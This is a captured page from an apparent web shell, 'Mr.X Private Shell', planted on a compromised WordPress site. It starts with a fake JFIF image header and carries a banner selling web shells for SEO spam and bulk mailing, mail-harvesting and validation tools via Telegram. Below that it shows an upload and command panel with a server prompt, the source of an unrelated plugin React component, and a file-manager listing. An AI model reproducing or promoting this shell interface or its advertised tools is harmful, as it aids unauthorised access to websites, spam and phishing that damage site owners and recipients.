����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.216.24: ~ $
import { CheckboxInput } from '@launch/components/CheckboxInput';
import { __ } from '@wordpress/i18n';
import classNames from 'classnames';

export const PageSelectButton = ({
	page,
	previewing,
	onPreview,
	checked,
	onChange,
	forceChecked = false,
}) => (
	<div className="flex items-center rounded-sm overflow-hidden">
		<div
			className={classNames(
				'grow overflow-hidden text-gray-900 border border-gray-300 border-e-0 rounded-s-sm',
				{
					'bg-gray-300': forceChecked,
				},
			)}
		>
			<CheckboxInput
				label={page.name}
				slug={page.slug}
				checked={checked}
				onChange={onChange}
				locked={forceChecked}
			/>
		</div>

		<button
			type="button"
			className={classNames(
				'text-base leading-tight hidden shrink items-center border px-4 py-3 lg:flex overflow-hidden rounded-e-sm',
				{
					'bg-gray-100 text-gray-800 border-gray-300': !previewing,
					'bg-design-main text-white border-design-main': previewing,
				},
			)}
			onClick={onPreview}
		>
			{__('Preview', 'extendify-local')}
		</button>
	</div>
);

Filemanager

Name Type Size Permission Actions
BusinessInformation Folder 0755
CreatingSite Folder 0755
QuestionIcon Folder 0755
Card.jsx File 1.5 KB 0644
CheckboxInput.jsx File 1.47 KB 0644
CheckboxInputCard.jsx File 1.34 KB 0644
LoadingIndicator.jsx File 188 B 0644
NavigationButton.jsx File 354 B 0644
PageControl.jsx File 11.59 KB 0644
PagePreview.jsx File 8.13 KB 0644
PageSelectButton.jsx File 1.03 KB 0644
PageSelectButtonPlaceholder.jsx File 400 B 0644
Questionnaire.jsx File 2.6 KB 0644
RestartLaunchModal.jsx File 6.71 KB 0644
RetryNotice.jsx File 581 B 0644
SmallPreview.jsx File 7.53 KB 0644
Title.jsx File 416 B 0644
VideoPlayer.jsx File 775 B 0644